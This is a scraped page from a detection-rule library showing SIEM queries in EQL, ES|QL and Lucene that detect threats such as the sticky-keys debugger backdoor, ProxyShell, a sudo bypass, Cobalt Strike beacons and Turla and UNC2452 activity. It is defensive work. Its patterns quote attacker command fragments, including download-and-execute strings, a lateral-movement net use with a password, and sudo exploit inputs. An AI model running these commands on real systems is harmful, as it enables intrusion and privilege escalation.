Tool
Splunk
12,781 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
◈
Detections
50 shown of 12,781Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Show query
any where TargetObject like~ ("*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger", "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger")Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Show query
from * metadata _id, _index, _version | where ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger") or ends_with(TargetObject, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger")
Sticky Key Like Backdoor Usage - Registry
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Show query
TargetObject:(*\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\sethc.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\utilman.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\osk.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\Magnify.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\Narrator.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\DisplaySwitch.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\atbroker.exe\\Debugger OR *\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Image\ File\ Execution\ Options\\HelpPane.exe\\Debugger)
Elastic
Converted
EQL
critical
Successful Exchange ProxyShell Attack
Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
Show query
any where cs-uri-query:"*/autodiscover.json*" and (cs-uri-query like~ ("*/powershell*", "*/mapi/nspi*", "*/EWS*", "*X-Rps-CAT*")) and (sc-status like~ (200, 301))
Elastic
Converted
ES|QL
critical
Successful Exchange ProxyShell Attack
Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
Show query
from * metadata _id, _index, _version | where `cs-uri-query` like "*/autodiscover.json*" and (`cs-uri-query` like "*/powershell*" or `cs-uri-query` like "*/mapi/nspi*" or `cs-uri-query` like "*/EWS*" or `cs-uri-query` like "*X-Rps-CAT*") and (`sc-status` in (200, 301))
Elastic
Converted
Lucene
critical
Successful Exchange ProxyShell Attack
Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
Show query
cs-uri-query:*\/autodiscover.json* AND (cs-uri-query:(*\/powershell* OR *\/mapi\/nspi* OR *\/EWS* OR *X\-Rps\-CAT*)) AND (sc-status:(200 OR 301))
Sudo Privilege Escalation CVE-2019-14287 - Builtin
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Show query
any where USER like~ ("#-*", "#*4294967295")Sudo Privilege Escalation CVE-2019-14287 - Builtin
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Show query
from * metadata _id, _index, _version | where starts_with(USER, "#-") or USER like "#*4294967295"
Sudo Privilege Escalation CVE-2019-14287 - Builtin
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
Show query
USER:(#\-* OR #*4294967295)
Elastic
Converted
EQL
critical
Suspicious Child Process Of Veeam Dabatase
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Show query
any where (ParentImage:"*\\sqlservr.exe" and ParentCommandLine:"*VEEAMSQL*") and (((Image like~ ("*\\cmd.exe", "*\\powershell.exe", "*\\pwsh.exe", "*\\wsl.exe", "*\\wt.exe")) and (CommandLine like~ ("*-ex *", "*bypass*", "*cscript*", "*DownloadString*", "*http://*", "*https://*", "*mshta*", "*regsvr32*", "*rundll32*", "*wscript*", "*copy *"))) or (Image like~ ("*\\net.exe", "*\\net1.exe", "*\\netstat.exe", "*\\nltest.exe", "*\\ping.exe", "*\\tasklist.exe", "*\\whoami.exe")))
Elastic
Converted
ES|QL
critical
Suspicious Child Process Of Veeam Dabatase
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Show query
from * metadata _id, _index, _version | where ends_with(ParentImage, "\\sqlservr.exe") and ParentCommandLine like "*VEEAMSQL*" and ((ends_with(Image, "\\cmd.exe") or ends_with(Image, "\\powershell.exe") or ends_with(Image, "\\pwsh.exe") or ends_with(Image, "\\wsl.exe") or ends_with(Image, "\\wt.exe")) and (CommandLine like "*-ex *" or CommandLine like "*bypass*" or CommandLine like "*cscript*" or CommandLine like "*DownloadString*" or CommandLine like "*http://*" or CommandLine like "*https://*" or CommandLine like "*mshta*" or CommandLine like "*regsvr32*" or CommandLine like "*rundll32*" or CommandLine like "*wscript*" or CommandLine like "*copy *") or ends_with(Image, "\\net.exe") or ends_with(Image, "\\net1.exe") or ends_with(Image, "\\netstat.exe") or ends_with(Image, "\\nltest.exe") or ends_with(Image, "\\ping.exe") or ends_with(Image, "\\tasklist.exe") or ends_with(Image, "\\whoami.exe"))
Elastic
Converted
Lucene
critical
Suspicious Child Process Of Veeam Dabatase
Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Show query
(ParentImage:*\\sqlservr.exe AND ParentCommandLine:*VEEAMSQL*) AND (((Image:(*\\cmd.exe OR *\\powershell.exe OR *\\pwsh.exe OR *\\wsl.exe OR *\\wt.exe)) AND (CommandLine:(*\-ex\ * OR *bypass* OR *cscript* OR *DownloadString* OR *http\:\/\/* OR *https\:\/\/* OR *mshta* OR *regsvr32* OR *rundll32* OR *wscript* OR *copy\ *))) OR (Image:(*\\net.exe OR *\\net1.exe OR *\\netstat.exe OR *\\nltest.exe OR *\\ping.exe OR *\\tasklist.exe OR *\\whoami.exe)))
Suspicious Cobalt Strike DNS Beaconing - DNS Client
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
any where EventID:3008 and ((QueryName like~ ("aaa.stage.*", "post.1*")) or QueryName:"*.stage.123456.*")Suspicious Cobalt Strike DNS Beaconing - DNS Client
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
from * metadata _id, _index, _version | where EventID==3008 and (starts_with(QueryName, "aaa.stage.") or starts_with(QueryName, "post.1") or QueryName like "*.stage.123456.*")
Suspicious Cobalt Strike DNS Beaconing - DNS Client
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
EventID:3008 AND ((QueryName:(aaa.stage.* OR post.1*)) OR QueryName:*.stage.123456.*)
Suspicious Cobalt Strike DNS Beaconing - Sysmon
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
any where (QueryName like~ ("aaa.stage.*", "post.1*")) or QueryName:"*.stage.123456.*"Suspicious Cobalt Strike DNS Beaconing - Sysmon
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
from * metadata _id, _index, _version | where starts_with(QueryName, "aaa.stage.") or starts_with(QueryName, "post.1") or QueryName like "*.stage.123456.*"
Suspicious Cobalt Strike DNS Beaconing - Sysmon
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Show query
(QueryName:(aaa.stage.* OR post.1*)) OR QueryName:*.stage.123456.*
Elastic
Converted
EQL
critical
Suspicious PowerShell Mailbox Export to Share
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Show query
any where CommandLine:"*New-MailboxExportRequest*" and CommandLine:"* -Mailbox *" and CommandLine:"* -FilePath \\\\*"
Elastic
Converted
ES|QL
critical
Suspicious PowerShell Mailbox Export to Share
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Show query
from * metadata _id, _index, _version | where CommandLine like "*New-MailboxExportRequest*" and CommandLine like "* -Mailbox *" and CommandLine like "* -FilePath \\\\*"
Elastic
Converted
Lucene
critical
Suspicious PowerShell Mailbox Export to Share
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Show query
CommandLine:*New\-MailboxExportRequest* AND CommandLine:*\ \-Mailbox\ * AND CommandLine:*\ \-FilePath\ \\\\*
Elastic
Converted
EQL
critical
Suspicious PowerShell Mailbox Export to Share - PS
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Show query
any where ScriptBlockText:"*New-MailboxExportRequest*" and ScriptBlockText:"* -Mailbox *" and ScriptBlockText:"* -FilePath \\\\*"
Elastic
Converted
ES|QL
critical
Suspicious PowerShell Mailbox Export to Share - PS
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Show query
from * metadata _id, _index, _version | where ScriptBlockText like "*New-MailboxExportRequest*" and ScriptBlockText like "* -Mailbox *" and ScriptBlockText like "* -FilePath \\\\*"
Elastic
Converted
Lucene
critical
Suspicious PowerShell Mailbox Export to Share - PS
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Show query
ScriptBlockText:*New\-MailboxExportRequest* AND ScriptBlockText:*\ \-Mailbox\ * AND ScriptBlockText:*\ \-FilePath\ \\\\*
Telnet Authentication Bypass via User Environment Variable
Identifies potential exploitation of a Telnet remote authentication bypass vulnerability (CVE-2026-24061) in GNU Inetutils
telnetd. The vulnerability allows unauthenticated access by supplying a crafted `-f <username>` value via the `USER` environment
variable, resulting in a login process spawned with elevated privileges.
Elastic
Original
KQL
critical
Threat Intel Filebeat Module (v7.x) Indicator Match
This rule is triggered when indicators from the Threat Intel Filebeat module (v7.x) has a match against local file or
network observations.
TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method by mocking directories
Show query
any where Image like~ ("*C:\\Windows \\System32\\*", "*C:\\Windows \\SysWOW64\\*")TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method by mocking directories
Show query
from * metadata _id, _index, _version | where Image like "*C:\\Windows \\System32\\*" or Image like "*C:\\Windows \\SysWOW64\\*"
TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method by mocking directories
Show query
Image:(*C\:\\Windows\ \\System32\\* OR *C\:\\Windows\ \\SysWOW64\\*)
Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
Show query
any where (CommandLine like~ ("*tracert -h 10 yahoo.com*", "*.WSqmCons))|iex;*", "*Fr`omBa`se6`4Str`ing*")) or (CommandLine regex~ "net\s+use\s+https:\/\/docs.live.net" and CommandLine:"*@aol.co.uk*")Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
Show query
from * metadata _id, _index, _version | where CommandLine like "*tracert -h 10 yahoo.com*" or CommandLine like "*.WSqmCons))|iex;*" or CommandLine like "*Fr`omBa`se6`4Str`ing*" or CommandLine rlike "net\\s+use\\s+https://docs.live.net" and CommandLine like "*@aol.co.uk*"
Turla Group Commands May 2020
Detects commands used by Turla group as reported by ESET in May 2020
Show query
(CommandLine:(*tracert\ \-h\ 10\ yahoo.com* OR *.WSqmCons\)\)\|iex;* OR *Fr`omBa`se6`4Str`ing*)) OR (CommandLine:/net\s+use\s+https:\/\/docs.live.net/ AND CommandLine:*@aol.co.uk*)
Turla Group Lateral Movement
Detects automated lateral movement by Turla group
Show query
any where CommandLine like~ ("net use \\\\%DomainController%\\C$ \"P@ssw0rd\" *", "dir c:\\*.doc* /s", "dir %TEMP%\\*.exe")Turla Group Lateral Movement
Detects automated lateral movement by Turla group
Show query
from * metadata _id, _index, _version | where starts_with(CommandLine, "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" ") or CommandLine like "dir c:\\*.doc* /s" or CommandLine like "dir %TEMP%\\*.exe"
Turla Group Lateral Movement
Detects automated lateral movement by Turla group
Show query
CommandLine:(net\ use\ \\\\%DomainController%\\C$\ \"P@ssw0rd\"\ * OR dir\ c\:\\*.doc*\ \/s OR dir\ %TEMP%\\*.exe)
Turla Group Named Pipes
Detects a named pipe used by Turla group samples
Show query
any where PipeName like~ ("\\atctl", "\\comnap", "\\iehelper", "\\sdlrpc", "\\userpipe")Turla Group Named Pipes
Detects a named pipe used by Turla group samples
Show query
from * metadata _id, _index, _version | where PipeName in ("\\atctl", "\\comnap", "\\iehelper", "\\sdlrpc", "\\userpipe")Turla Group Named Pipes
Detects a named pipe used by Turla group samples
Show query
PipeName:(\\atctl OR \\comnap OR \\iehelper OR \\sdlrpc OR \\userpipe)
Turla PNG Dropper Service
This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
Show query
any where Provider_Name:"Service Control Manager" and EventID:7045 and ServiceName:"WerFaultSvc"
Turla PNG Dropper Service
This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
Show query
from * metadata _id, _index, _version | where Provider_Name=="Service Control Manager" and EventID==7045 and ServiceName=="WerFaultSvc"
Turla PNG Dropper Service
This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
Show query
Provider_Name:Service\ Control\ Manager AND EventID:7045 AND ServiceName:WerFaultSvc
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Show query
any where (CommandLine:"*Invoke-WMIMethod win32_process -name create -argumentlist*" and CommandLine:"*rundll32 c:\\windows*") or (CommandLine:"*wmic /node:*" and CommandLine:"*process call create \"rundll32 c:\\windows*")
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Show query
from * metadata _id, _index, _version | where CommandLine like "*Invoke-WMIMethod win32_process -name create -argumentlist*" and CommandLine like "*rundll32 c:\\windows*" or CommandLine like "*wmic /node:*" and CommandLine like "*process call create \"rundll32 c:\\windows*"
UNC2452 PowerShell Pattern
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Show query
(CommandLine:*Invoke\-WMIMethod\ win32_process\ \-name\ create\ \-argumentlist* AND CommandLine:*rundll32\ c\:\\windows*) OR (CommandLine:*wmic\ \/node\:* AND CommandLine:*process\ call\ create\ \"rundll32\ c\:\\windows*)
Elastic
Converted
EQL
critical
UNC4841 - Potential SEASPY Execution
Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Show query
any where Image like~ ("*/BarracudaMailService", "*/resize2fstab", "*/resize_reisertab")
Elastic
Converted
ES|QL
critical
UNC4841 - Potential SEASPY Execution
Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Show query
from * metadata _id, _index, _version | where ends_with(Image, "/BarracudaMailService") or ends_with(Image, "/resize2fstab") or ends_with(Image, "/resize_reisertab")
Elastic
Converted
Lucene
critical
UNC4841 - Potential SEASPY Execution
Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
Show query
Image:(*\/BarracudaMailService OR *\/resize2fstab OR *\/resize_reisertab)
Ursnif Malware C2 URL Pattern
Detects Ursnif C2 traffic.
Show query
any where (c-uri like~ ("*_2f*", "*_2b*")) and (c-uri:"*.avi*" and c-uri:"*/images/*")Ursnif Malware C2 URL Pattern
Detects Ursnif C2 traffic.
Show query
from * metadata _id, _index, _version | where (`c-uri` like "*_2f*" or `c-uri` like "*_2b*") and `c-uri` like "*.avi*" and `c-uri` like "*/images/*"
Ursnif Malware C2 URL Pattern
Detects Ursnif C2 traffic.
Show query
(c-uri:(*_2f* OR *_2b*)) AND (c-uri:*.avi* AND c-uri:*\/images\/*)
Showing 451-500 of 12,781